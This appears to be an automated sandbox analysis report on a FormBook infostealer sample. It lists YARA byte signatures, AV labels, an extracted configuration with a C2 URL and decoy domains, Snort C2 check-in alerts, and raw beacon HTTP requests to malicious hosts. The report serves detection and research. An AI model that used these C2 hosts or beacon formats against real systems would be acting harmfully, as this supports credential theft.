4.0.tM32bSteJD.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
2.2.tM32bSteJD.exe.2200000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.tM32bSteJD.exe.2200000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.tM32bSteJD.exe.2200000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
4.0.tM32bSteJD.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.tM32bSteJD.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.tM32bSteJD.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
4.2.tM32bSteJD.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.tM32bSteJD.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.tM32bSteJD.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 22 entries

Jbx Signature Overview

• AV Detection
• Compliance
• Spreading
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.pawastreams.com/ndf8/"], "decoy": ["cantobait.com", "theangularteam.com", "qq2222.xyz", "floridasteamclean.com", "daffodilhilldesigns.com", "mindfulagilecoaching.com", "xbyll.com", "jessicaepedro2021.net", "ccssv.top", "zenginbilgiler.com", "partumball.com", "1681890.com", "schippermediaproductions.com", "m2volleyballclub.com", "ooiase.com", "sharingtechnology.net", "kiminplaka.com", "usedgeartrader.com", "cosyba.com", "foodfriendshipandyou.com", "ottolimo.com", "growingyourlist.com", "therealvictoriabelieves.com", "juststartmessy.com", "giovannahuyke.biz", "conditionsapplied.com", "hypadel.com", "hpywk.com", "safepostcourier.com", "heshicn.net", "perfektdesigns.com", "4008238110.com", "29store.xyz", "frasins.com", "amrittrading.com", "dimaiwang.com", "promtgloan.com", "rosalvarodriguez.com", "yiqingdh.xyz", "toloache-matrix.com", "homevoru.com", "esatescort.xyz", "onlinedictionary.cloud", "smarthomesecurity.online", "nikisankala.com", "multizoneductlessminisplits.com", "32123.space", "bethesdagardensloveland.com", "bestpicture-toglancetoday.info", "mochicascafe.com", "moneylovepig.com", "envisioneyecare.net", "jumbul.com", "onbecomingalifecoach.com", "gubosaonline.com", "2636654.win", "ktxloo.com", "side-clicks.com", "spectrumassociation.com", "albatrosmed.store", "drsazidalsahaf.com", "applykpologistics.com", "rezzo-jazzavienne.com", "huachen100.net"]}

Multi AV Scanner detection for submitted file

Source: tM32bSteJD.exe	Virustotal: Detection: 50%			Perma Link
Source: tM32bSteJD.exe	ReversingLabs: Detection: 41%

Yara detected FormBook

Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.sharingtechnology.net/ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX	Avira URL Cloud: Label: malware
Source: http://www.zenginbilgiler.com/ndf8/?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX	Avira URL Cloud: Label: malware
Source: http://www.pawastreams.com/ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX	Avira URL Cloud: Label: malware
Source: http://www.mindfulagilecoaching.com/ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX	Avira URL Cloud: Label: malware
Source: www.pawastreams.com/ndf8/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsv6BBF.tmp\pmtkix.dll

ReversingLabs: Detection: 39%

Machine Learning detection for sample

Source: tM32bSteJD.exe

Joe Sandbox ML: detected

Source: 4.0.tM32bSteJD.exe.400000.2.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 11.2.wscript.exe.5b8d58.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.0.tM32bSteJD.exe.400000.3.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 4.0.tM32bSteJD.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.wscript.exe.4f4796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.0.tM32bSteJD.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.tM32bSteJD.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 2.2.tM32bSteJD.exe.2200000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.tM32bSteJD.exe.400000.1.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 4.0.tM32bSteJD.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tM32bSteJD.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: tM32bSteJD.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wscript.pdbGCTL source: tM32bSteJD.exe, 00000004.00000002.377180434.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376051931.0000000000779000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: tM32bSteJD.exe, 00000002.00000003.294227609.000000001AEB0000.00000004.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000002.00000003.295672931.000000001B040000.00000004.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376434963.0000000000B2F000.00000040.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376208105.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.559028303.0000000004B2F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.558895131.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.377444114.0000000004870000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: tM32bSteJD.exe, tM32bSteJD.exe, 00000004.00000002.376434963.0000000000B2F000.00000040.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376208105.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, wscript.exe, 0000000B.00000002.559028303.0000000004B2F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.558895131.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.377444114.0000000004870000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wscript.pdb source: tM32bSteJD.exe, 00000004.00000002.377180434.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376051931.0000000000779000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_00402630 FindFirstFileA,

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 103.224.182.241:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 103.224.182.241:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 103.224.182.241:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49797 -> 54.203.72.218:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49797 -> 54.203.72.218:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49797 -> 54.203.72.218:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49798 -> 183.181.96.116:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49798 -> 183.181.96.116:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49798 -> 183.181.96.116:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.zenginbilgiler.com
Source: C:\Windows\explorer.exe	Domain query: www.bethesdagardensloveland.com
Source: C:\Windows\explorer.exe	Network Connect: 198.46.81.209 80
Source: C:\Windows\explorer.exe	Network Connect: 54.203.72.218 80
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.241 80
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.42 80
Source: C:\Windows\explorer.exe	Domain query: www.safepostcourier.com
Source: C:\Windows\explorer.exe	Network Connect: 192.64.118.79 80
Source: C:\Windows\explorer.exe	Domain query: www.theangularteam.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.bestpicture-toglancetoday.info
Source: C:\Windows\explorer.exe	Network Connect: 52.49.198.28 80
Source: C:\Windows\explorer.exe	Domain query: www.sharingtechnology.net
Source: C:\Windows\explorer.exe	Network Connect: 45.144.154.230 80
Source: C:\Windows\explorer.exe	Domain query: www.mindfulagilecoaching.com
Source: C:\Windows\explorer.exe	Domain query: www.pawastreams.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.pawastreams.com/ndf8/

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: INMOTI-1US INMOTI-1US

Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX HTTP/1.1Host: www.sharingtechnology.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=Jkb3qULodAPsbwEkWvkNxdGDgcgioern+VdRvmK2C6x/Zi+k8aFahwHydMBBXChJ4TlK&ihe4W=5jMxZX HTTP/1.1Host: www.safepostcourier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX HTTP/1.1Host: www.mindfulagilecoaching.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=ivAFo0A+NqvrlfwHnO69DiIiTNfvi2ac6XE5GsUcPQCQwjrhO7vznBZ3k8qerGpNfj8C&ihe4W=5jMxZX HTTP/1.1Host: www.bethesdagardensloveland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=UDlWqClyQYAxvw1qhQyotXnG6StVuzlosSzrK5RtNenfTIGzfkaW05z+heFbWRXNUIb8&ihe4W=5jMxZX HTTP/1.1Host: www.theangularteam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX HTTP/1.1Host: www.zenginbilgiler.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX HTTP/1.1Host: www.pawastreams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=3cYFrCEtfJlcg4ld1aVHN5gMYg5Zt2FExUyTFUcyhukshY2DzeoXaRCbeMAEi8U22TkD&ihe4W=5jMxZX HTTP/1.1Host: www.bestpicture-toglancetoday.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=ggw9hHOBDDdESRr+AgwRlMKcO473LY4IfLFd6/0WA0ZukpfiF712g3X0dfEv6OyyQaoN&ihe4W=5jMxZX HTTP/1.1Host: www.partumball.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.182.241 103.224.182.241
Source: Joe Sandbox View	IP Address: 52.49.198.28 52.49.198.28

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 31 Jan 2022 08:04:51 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f5decc-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressContent-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Mon, 31 Jan 2022 08:05:07 GMTConnection: closeServer: lighttpd/1.4.54Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 31 Jan 2022 08:05:24 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: tM32bSteJD.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: tM32bSteJD.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown

DNS traffic detected: queries for: www.sharingtechnology.net

Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX HTTP/1.1Host: www.sharingtechnology.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=Jkb3qULodAPsbwEkWvkNxdGDgcgioern+VdRvmK2C6x/Zi+k8aFahwHydMBBXChJ4TlK&ihe4W=5jMxZX HTTP/1.1Host: www.safepostcourier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX HTTP/1.1Host: www.mindfulagilecoaching.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=ivAFo0A+NqvrlfwHnO69DiIiTNfvi2ac6XE5GsUcPQCQwjrhO7vznBZ3k8qerGpNfj8C&ihe4W=5jMxZX HTTP/1.1Host: www.bethesdagardensloveland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=UDlWqClyQYAxvw1qhQyotXnG6StVuzlosSzrK5RtNenfTIGzfkaW05z+heFbWRXNUIb8&ihe4W=5jMxZX HTTP/1.1Host: www.theangularteam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX HTTP/1.1Host: www.zenginbilgiler.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX HTTP/1.1Host: www.pawastreams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=3cYFrCEtfJlcg4ld1aVHN5gMYg5Zt2FExUyTFUcyhukshY2DzeoXaRCbeMAEi8U22TkD&ihe4W=5jMxZX HTTP/1.1Host: www.bestpicture-toglancetoday.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ndf8/?r48X=ggw9hHOBDDdESRr+AgwRlMKcO473LY4IfLFd6/0WA0ZukpfiF712g3X0dfEv6OyyQaoN&ihe4W=5jMxZX HTTP/1.1Host: www.partumball.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
